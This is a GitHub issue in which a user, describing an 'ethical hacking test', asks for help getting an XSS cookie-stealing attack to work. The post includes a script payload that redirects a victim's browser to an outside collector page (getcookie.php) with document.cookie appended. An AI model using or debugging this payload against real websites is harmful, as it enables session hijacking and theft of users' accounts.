-
-
Notifications
You must be signed in to change notification settings - Fork 488
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
XSS help #355
Comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie
I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt
This is the getcookie.php file:
When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>
I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH
and I don't see any cookies in cookies.txt
What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:
Thank you
The text was updated successfully, but these errors were encountered: